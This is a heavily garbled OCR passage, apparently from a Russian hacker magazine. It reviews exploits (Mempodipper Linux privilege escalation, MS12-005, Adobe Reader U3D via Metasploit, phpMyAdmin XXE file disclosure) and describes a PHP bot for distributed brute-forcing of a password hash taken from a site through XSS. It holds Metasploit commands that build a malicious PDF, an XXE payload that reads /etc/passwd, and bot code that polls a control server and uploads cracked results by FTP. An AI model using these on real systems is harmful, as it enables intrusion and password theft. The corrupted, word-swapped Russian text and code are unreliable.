int match; rcu_read_lock(); match=(ptrace_parent(task)==current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m ваша милость полня ется ёбаный ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data=( void*)(( long)current->self_exec_id); file- >f_mode 0=FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

Стало бы ть , в находка пропал никаких ограни ч е н ий - какой приглянется может это сде лать. Одн ако н а ради пись равным образом редакция некоторые люди ограничения вс ё­ таки обычай н овлены. Обратимся для коду функции, которая осущест вля­

ет запис ь lприведена тротил ьк относительно н аиболее важная доза функции):

Чтобы ради 3 сь пр ошла успешно, ее обязан применять либо самовольно

п роцесс ltask==сuггепtl, либо батяня , трассирующий текущий про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс при помощи рtгасе . Итиль зличные трюки от рtгасе безграмотный увенчались успехом,

позтому рассмотрим тип не без; task

==сuггепt. Чт об кабы эксплуатация самолично

следовать пишет н уже ные нам данны е себя во память? Очевидно, зачем н акробат воздуха во п ер­

вую караван интересуют процессы со атрибутом

! * ... *! struct task_struct * task=get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm=check_mem_permission(task); copied=PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Итиль ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, что такое? н а stdeгг выдается вместе с тро ка, соз данная из нашим

участием. Казалось бы, наша сестра можем что касается ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) разыскать нужное пространство во памяти , вместе с через dup211 связать стереотипный наводнение ошибок равным образом файловый дескриптор откры­

*/ i f ( file- >privat e_data !=( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, занести нужные данные, а следовать т ем исполнить шелл-код . Однако неграмотный всё приближенно просто. Здесь выполняется вторая про­ верка , на ходе которой текущее авторитет

self_exec _ id от равнива ется

со значением, не без; поддержка по отношению щью которого был соз дан файловый дескать скри п ­

0* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся двум проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission да

каждом запуске пр относительно ц есса, того наш брат далеко не можем п олучи тьд оступ ко

self_exec_id. Функция check_mem_pe гmission является безыскусственный обер т который в целях __ check_

Тем малограмотный менее, эту проверку не возбраняется пройти : со через foгkll автор сих строк созда­

памяти вышеизложенным способом.

mem_peгmission, видишь ч т что до возлюбленная делает:

ем потомица равно вн у три него от через execll из т артуем новоявленный процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда автор сих строк из-за п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр что до ц есс имеет значе ни е

self_exec_id , равное ее

вается держи еди вниз у. В нашем пото мке автор открываем шаг мя ть пр е д ка равно

создаем файловый д ескриптор про /pгoc/<P ID пр е д ка>/mе m , хорошо

struct mm_st ruct *mm;

получай насчёт т крытие несть провер ок. В предке т ем временем вслед п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm=get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

не без; помощью, вроде выразился самостоятельно соз несомненно те ль экс плоита , <<о чень черной

магии со кетов молод икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор с п отомка да возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, за какому адресу действовать запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

в долгу отяготить нашу следовать д а ч у, все взгляни в это:

$ readelf -h / bin /s u 0 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам во вкусе бы нам екает, который план

su использует вместе с татич е­

ский а др нашел сек ции .text !в ином случае был бы разряд DYN, а безграмотный Е Х ЕС) . Это означает, что-то

su на большинстве дистрибутивов скомпи лиров ана Pl Е , от ледовательно, ASLR ради секции .text ра бо­

вне использования

вор далеко не будет, зачем у проща ет состряпывание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен держи exgloit-db .com , EDB-10 08411 . Пр име р е г в отношении использования представлен получи ск р равным образом нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 02-

равным образом 04-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 0012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

0

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых чтобы запуска встроенного

·

СliсkОnсе-приложения из полными правами доступа IFull Tгustl. В результатевыполнения описанных за пределами действий для экране

~3

CVSSV2

011111 011 011 01 01 0

появится цепь диалоговых окон. Однако пользователю невыгодный нужно

011 01

ничто из ними уделывать .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, рано или поздно

PoweгPoint работает во ре ж да м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится на полноэкранном режиме, по прошествии выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит воскрешение фокуса. После запус~а

удаленной системесправами текущего пользователя. Для сего

СliсkОnсе-приложения ты да я можем делегировать сведения диалоговым

ламер уязвимой системы принуждён зайти держи намеренно сфор­

окнам, с целью локаутировать их.

мированную wеЬ-страницу иначе вскрыть заранее обдуманный обложка

Office.

Уязвимость присутствует на механизме безопасности

lj:JЦ!•Jii

Дело во том, почто

Уязвимость, описанная на

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему обложка такого вроде не запрещается насадить во оригинал Office. Когда ламер уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает пара аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли обложка испол­

ный обложка безотчетно выполняется . Напомню, что-то

няемым, сопоставляя расширения файлов из элементами таблицы

ClickOnce- сие

!для комфорт назовем ее ехесЕхtТаЫе).

методика развертывания, позволяющая творить самообновляе­ мые приложения

Windows,

которые могутустанавливаться равным образом запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 0 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться подле минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: со веб-страницы,

общего сетевого ресурса тож носителя, так колтун движение кт-диска . Его можно поставить сверху электронная вычислительная машина конечного пользователя равным образом запустить локально, ажно неравно пэвм далеко не подключен для сети, иначе пустить

на оперативном режиме, вне установки каких-либо компонентов в

супермикроэвм конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий равным образом безотчетно заменяя целое обновленные файлы. Для реализации атаки на данном случае используем специальным

образом сформированный обложка презентации PoweгPoint. Эта про­

грамма позволяет приуготовить Custom Animation'ы про ОLЕ-пакетов . В предпочтение с обычных анимаций, автор можем задатьдве специфичные

с целью OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) да Edit Package [редактировать пакет). При Activate Contents выполняются те а действия, что-то и при двойном щелчке пользователя согласно встроенному объекту. Таким

образом,

Custom Animation'ы позволяют реализовывать указанные немного

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

с

: отклик

от ОТ

ото

со

lb.wo~dp~e ss .com

02.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 02

& а ~т=32 &а~т=32 &а~т=32 &а~ т=32

В ре 0·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 02.233.69.6: Пакетов: отnравлено=4, nолучено Приблизительное минута nриема - nереnачи

0,

0

0

Минимальное

=2 00t·1C =166t1c =168t·1C =166t1C

на

а

&а~т:

ТТL=127 ТТL=127 ТТL=127 ТТL=127

nот е ряно

=0 (0%

nотерь),

мс :

=166мсек, Максимальное=240 м из ек, Ср е nне е=185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 092 .168. 0. 0: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

0***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

02.233.2.58, 02.233.69.6, 06.74.254.120 76.74.254.123, 04.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- забытый

058

Python- скри пт

ХАКЕР

03/1 08/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 0В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем на цикле этутаблицу да смотрим, имеет ли встроенный обложка такое а расширение, по образу равным образом элементтаблицы. Д ля этого используется отправления l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит на том, в чем дело? на таблице приведена как только часть существующих расширений чтобы исполняемых файлов. В качестве примера позволяется возьми хоть ру другими словами

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно из да е не без; шкапа ж да м что касается е 0D -о б ъекта во т е ле рdl - ф ай ла

А- прозвание , около которым должна фигурировать активирована реферат . РО- конспект должна активироваться, равно как всего только открывает­ ся страница, содержащая аннотацию возьми 0 D -данные.

lj:JЦ!e]ii Последовательностьзапу со ка объектов :

0. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, только лишь если файл является исполняемым. Н что касается рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она заново проходит согласно табли ц е

Объект 0 - маневр OpenAction инициирует лозунг к JavaScript. Объект 04-JavaScгipt ссылается для вещь 05. Объект 05- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, коли развертывание встроенного файла невыгодный содержится

кроме переходит нате вторую страницу.

во ехесЕхtТаЫе, никаких предупреждений неграмотный выдается.

Объект 01-определение 0D-данных равно показ их форматирова­

Пропатченный

ния.

Объект 0О - 0D-данные, которые будут возникать !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 0008 SP2, Windows 0.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 0О -ссылается держи именованные словари I/3D, /U3DI. Объект 01- ссылается получай именованные словари I/3DI, /3DD, / 0D,

Существует обновление, устраняющее эту уязвимость.

/ 0DAI.

0

Уязвимость на Adobe UЗD-данных

Reader рядом обработке

CVSSV2

00.0

01111 01 01 011 01 011111

011 0 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

0ШIШ

Уязвимость вызвана ошибкой возле обработке U 0D-данных. Такая ошибка может повергнуть для сбою. П ри усище п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м ввести полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная нате библиотеке

Кратко опишем U3D-компоненты, с намерением вернее пиндос мать, какие из них используетсплоит:

Объект 05 - охватывает JаvаSсгiрt-коддля реализации heap spraying да перенаправления нате вторую страницу !инициирует

суд отображения 0D-данных ! . Сплоит реализован на Metasploit lпример от полезной нагрузкой во виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload=> windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd=> calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- получи житейский час одиночный п оддерживаемый под­ тип да 0D - объект.

F I L ENAМE

0DD lнеобходимl - определяе т течение тож словарник со 0D-данными,

OBFUSCATE

0DA lнеобязателенl - словарьактивации, наиболее значительный время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

рано или поздно надлежит представлять 0D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

0D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая коренной строй использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее имущество 0D-данных придеактивации.

ХАКЕР ОЗ/ 0 0 0/ 0 01 0

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию вследствие JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 0.4.0 / 0.4.5 / 0.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, тот или иной ссылается держи обложка /et€/

i'·'.J1Jfi

passwd, да nри обработкедокумента его начинка включается

Adobe Read eг 0.4.0 09.4.5 09.4.6 около Windows ХР SP3.

на него. Кстати говоря, на ХМL-документ не грех невыгодный всего лишь содержать

локальные равно удаленные файлы.

,_i,J!Iiii•J:I

В нем позволено шибать исполняемые файлы, когда парсеру раз­

решено и подписано сие творить . По стандарту сие выглядит nримерно таково :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version="1.0 " encoding="utf-8" ?> < ! DОСТУРЕ foo

LFI на phpMyAdmin посредством ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

0.0

011111 011 011 011 01111

011 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 0

[DШ В начале лета экспериментатор Магсо Batista опубликовал весьма интереснуюуяз вимо от тьтипа Loca l File lncluding. Эксnлуатируется

возлюбленная нетривиально, посредством ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой извод ХМ L-инъекции .

Напомню , ась? nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе не без; п омо щью программы ShowGif.exe обрабатыва­

запроса ко веб-серверу] не запрещается обновить содержание ХМL­

ется образец baг.gif. В некоторых случаях наша сестра можем насадить nо­

документа. Обычно любопытство представляютфайлы базы данных

добную конструкцию после ХМ L-и нъекцию да нагнать требуемый

xmiOB, гд е содержится уведомление в рассуждении пользователя х:

код. Более подробная ан фа об ХМ L-инъекциях вкушать возьми сайте OWASP

[goo.gi/BBG9C ]. c?xm l version="l . e" encoding="IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> /mail> </user>

lj:J4!•Jij В phpMyAdmin есть занятие имnорта базы данны х с заданного пользователем ХМ L-фа йла. Уязвимос ть заключается на том, зачем по­ сле загрузки спецом сформированного ХМL-документа атаку­

ющий получает допустимость [ограниченную nравами веб - сервера] прочит ать nрои зво льный обложка на системе или — или локальной сети.

Уязвимос ть возьми хо дится во файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается минуя проверки получай су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки для неглубокий примитив:

$xml=simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin с целью предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], раньше нежели за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала часть ко Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 000 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

0.

Логинится во phpMyAdmin от через предоставленных реквизи­ тов.

0.

СоздаетХМL-документ, применяя ХХЕ-инъекции на заданного файла.

Смышленый чтец безо труда nроведет аналогию из SQLинъекциями, а ваш покорнейший слуга тем временем nерейду самотеком ко инъек­

0. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный обложка вместе с серве ра.

циям подтипа ХХЕ . В дезоксикортикостерон ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются на начале судоремонтный завод уме нта во об­

Возможные оnции эксnлоита да nример успешной эксплуатации за ­

ласти ОТО. Существует серия видов близ м итивов, однако теперь нас

казаны получай скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если во определении примитива присутствует URI, так спирт называет со ваш покорный слуга внешним. Соответ­ ственно, парсер долженствует получитьдоступ для этому URI равно сделать смешанный частью его со держимое во документ, когда сие было задано, например, так:

c?xml version="1.0" encoding="utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 0.4.х

вnлоть до самого 0.4.7. 0 равно 0.3.х вплоть давно 0.3. 00.5.

f'·'••••t·'a

Обновиться наименьшее количество вплоть до вер эти phpMyAdmin 0.4.7. 0 [3 .3.1 0.5] иначе говоря

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012


взламывание

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи пользу кого брута

Кто-то выбрал пользу кого себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал выбор

с Античата;

ш~ единовластно изо консольных

брутеров;

www.l2ko.de кoнвepтep батников.

безвыгодный самому экзотическому

языку- РНР. А всё потому, что ми чаще доводится

На нашем диске ты сможешь выкопать

мучиться из вебом, нежели

однако необходимые

не без; десктопом. Но бывают да такие

файлы равно исходники, описанные на статье.

моменты, если тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. вот миг очередных ковыряний стоит на повестке дня

XSS,

ко ми

во лаги попал хеш движение рулон моя персона администратора нужного ми ресурса. Ко­ нечно же, его нуждаться было расшифровать, равно автор этих строк приёмом обратился к различным онлайн-сервисам, помогающим не без; расшифровкой. Ни нераздельно с них ми безграмотный помог. С этой душевной печалью ваш покорнейший слуга отправился сверху ха к-форумы, идеже

на специальных разделах оставил просьбу что до помощи на расшифров­ ке. Но да со временем меня ожидал фейл. Однако сайтик был вполне изо себя расчудесный, да метать его админку ми ничуть малограмотный хотелось. Заварив очередную кружку кофе, автор начал думать, равно как поступить. Брутить получи своей машине безграмотный получилось бы- вычислитель слабоват. Значит, нужно было так взять хоть пэвм не без; хорошими характе­

ристиками, равно надо бы невыгодный один. Покупать себя к себе

00

новых

мощных серваков про расшифровки одного хеша где-то далеко не входи­ ло во мои планы. Поэтому аз многогрешный купил сколько-нибудь выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И во тута аз многогрешный решил усилиться

062

ХАКЕР

03/158/2012


РНР-бот ради

Windows

Комnилим кавасаки

на процесс. А n что до чему бы малограмотный черкануть бота, пр равным образом н им ающего команду

function mySettings()

получай расшифровку хеш а из общего сервера? М ож н в отношении б ыло равным образом написать,

{

токмо чисто положение заключалась во том, что-то моя особа з н ал всего скрипто­

$settings=file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings !='' )

вые языки, а из десктопом отродясь безвыгодный имел мол л а . И туточки на моей памя­ ти всплыла такая вещь, наравне всевозм по части жные р hр 0 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 0' , $settings, 0 ); $config=array ( 'status'=> $status, 'data'=> $statusdata); return $config;

Бота моя персона решил раскрутить работать согласно весь определенному плану. Итак , существует сервер, получай ко насчёт торый добавляются << За­ дания » . Боты отстукивают получай него каждые пятеро минут, проверяя, не появилось ли ради них новое задание.

И коли появилось, посылают серверу звонок в отношении том, что-то б рут

начался. Сервер, во свою черед , добавляет на базу заметка в рассуждении том,

else return false;

который работает, а кто- нет. После завершения Брута лодка отправляе т серверу запрашивание вместе с уведомлением, что такое? вещь окончена. Этот задание

в свою очередь может включать расшифровку. При этом нужно содеять так, Эта ф у н ко ция обращается ко нашему гейту, ловит ответ, и, кабы

так чтобы боты использовали небо и земля словари чтобы брутфор са , беспричинно как брутить сам в соответствии с себе равным образом оный а лексика бессчетно разок попросту безграмотный имеет смысла. Также годится учесть, что такое? хеш ей может составлять много, посему автор сих строк

некто неграмотный п у ст ой , делит его в двум части там, идеже снедать знак

0.

Первая

пай представляет на лицо команду с целью бота, а вторая- допол­

малограмотный станем бранить сполна словник после брутфорс пользу кого каждого с них.

нительные сведения для того этой команды. Теперь напишем функцию

В процессе б рута ты да я будем за единый вздох а сличать результаты со все-

брутфорса для основе заданных во виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь лишь ряд функций да выступит, этак сказать, на качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> сделано самовластно брутфорсер. Именно

{

следственно нам нужно отобрать этакий брутфорсер, какой работает

/1 Сохраняем хеыи с целью брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

при помощи консоль, этак по образу кроме наш брат переведем скрипт вехе, который тоже работает на консольной среде. Я использовал наработку моего знакомого- возлюбленная имеет такого склада синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь начальный параметр-это обозначение файла от хешами для того

брутфорса [один хеш=одна строка), следующий параметр-название

// Говорим серверу, что такое? ты да я ранее работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а завершающий параметр-название файла, в какой-никакой брутер склифосовский писать результаты . Задачи серве­ ра- безошибочно учредить бота, иногда стирать рабочую

Сохраняем резу

$uploader

ьтат

в

сервере

no

Ф

r

=ftp_connect( 'ftp://adres.master.servera.com' );

папку, а в свой черед питать сигналы по части том, зачем миг бы сейчас начать б рут по мнению таким-то хешам. Для начатки напишем функцию обращения к серверу на получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т насчёт Ехе Converter v1. 0

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

что такое? наша сестра закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, выражение беретка на качестве аргумента сосредоточение из хе шами

ЕлаурЬоn

равно сохраняет его на удобоваримом пользу кого брутера формате, ведь убирать

0Et><тn>tlheor<I!J'10'

·-l

на виде текстового файла, во каждой строке которого находится один хеш. Затем лодка стучит получи сервер из сигналом в рассуждении том, почто начал

работать. Это нужно про того, чтоб сер вер малограмотный записывал бота в <<мерт вые >> машины, коли симпатия далеко не склифосовский печатать каждые число

0 Addv.sta _ _ _

минут !тайм-аут в соответствии с умолчанию), да помнил , сколько кавасаки функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему учреждённый обложка хе ш ей,

Oo..r.nte-Res

заданный тезаурус равным образом обложка к сохранения результатов . Соз­

P.w~ter:

даем вот и все функцию <<ус тановки >> бота. Установка представляет собой списывание да последующее оберегание словаря, соответственно которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

01

Exit

01

Компилим кофта дпя скрытного запуска брутера

{

$vocabulary=file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

равно по новой запускаем шедулер. Нужно учесть, почто обложка словаря не­

обходим ранее рядом первом обращении ко серверу, оттого сделаем предохранитель, что подготавли вает словар ь равным образом запускает шедулер :

Серверный от крипт, ко которому обращается бот, надо воз­

вертеть чудесно уникальные словари, так чтобы у каждой

if (!file_exists( './vocabulary.txt' ))

механизмы был особый <<с ловарный запас>>. Также стои т оставить возможно сть изменять тезаурус не без; через команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь а нам надо накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи безвыгодный позволяет ввергнуть

компилим

на этом месте адрес этой функции полностью, потому-то укажу только что ее кейсы

!полный шифр ищи нате нашем диске):

Теперь, эпизодически я объединили всё сие во сам файл, до нами

Ьгutе-брут;

встает теорема сотворить с него настоящий ехе. В этом нам по­

сlеап- очистка данных , полученны х во результате предыдущих

может небольшая тулза из длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет лицом билдер, некоторый создает ехе изо РНР­

фай ла. Билдер ради всё промежуток времени его использования ни разу никак не подво­

ехit-выход.

дил, работал отлично, сверх всяки х ба го во !респект авторам!). Этот билдер позволяет компи накрапывать экзешники во вкусе в целях РНР

По дефолту шедулер находи тс мы во режиме ожидания команд . В качестве тайм-аута автор сих строк указали

000

0.0, приближенно

да для того

больше новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

зазор обращения б от на ко нашему серверу. Далее соглашаться запускание

ляция во

Bambalam

выглядит вишь так:

команд из учетом данных , переданных сервером боту, вдобавок по­

сле выполнения команды я делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

0

РНР

bl

DeveiStudio

M<~miS4r

Однозначный глава

0

Php2exe tmJylyi'{4Y_R

0

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

0

Peri2Exe Ьit.ly/y29qШ

Преобразует завершающий

Более могучий инструмент,

Позволяет составлять

до конвертированию РНР­

адрес получай РНР на исnолняемый

безграмотный имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса равным образом позволяющий

держи Питоне, во экзешники.

Создает независимый исполняемый обложка ,

GUI-

Отличный аппарат чтобы

nрограммы . Тут

nриложемне могло

жете выковывать непосредственно на рента .

Помимо исполняемого

да визуальная мир

запуститься, на праздник но

Также комnилирует целые

файла, создаетнесколько

тот или другой работает во любых

программирования,

директории должна

проекты от исnользованием

библиотек, помогающих

системах равным образом неграмотный требует

равным образом настройка кода,

водиться книгохранилище

различных библиотек,

готовой программе

интерпретатора .

равно отсоединение различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей да многое другое .

ХАКЕР

03/158/2012


РНР-бот к

Windows

Сервис cmdS.ru предлагает Вам суммы проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша пароходство занимается вопросами компьютерной безопасности не без; 0006 года. База данных самая большая во мире

равно бери нынешний число включает рядом

0,800,000,000,000 записей, 05% 50 Терабайт•

данных распределен соответственно кластеру равным образом составляет

Пожалуйста Зарегистрируйтесь иначе говоря Автошчуйтесь

.

-

....

с которых уникальны. Суммарный габариты

. . -;. ·-f.,~ Сервис нате базе распределенных вычислений к расшифровки МD5-хешей

Итак, кавасаки готов. Теперь займемся сервером. Во-первых, нужно зафиксировать на базе те боты, которые успешно отстучали нам

проходит за по всем статьям файлам во папке гesults, один за другим открывает их равным образом добавляет во базу.

х отя бы единодержавно раз, так есть, беспричинно сказать, установленные боты. Для

сего выполняется ревизия IР-адресов во базе [можно присвоить специальный идентификатор каждой машине, какой симпатия хорэ

ХАКЕРСКИЕ ФИЧИ Теперь перейдем для оптимизации нашего самопального комплекса .

делегировать отдельный раз, дай тебе расслышать посередь лицом ха сты,

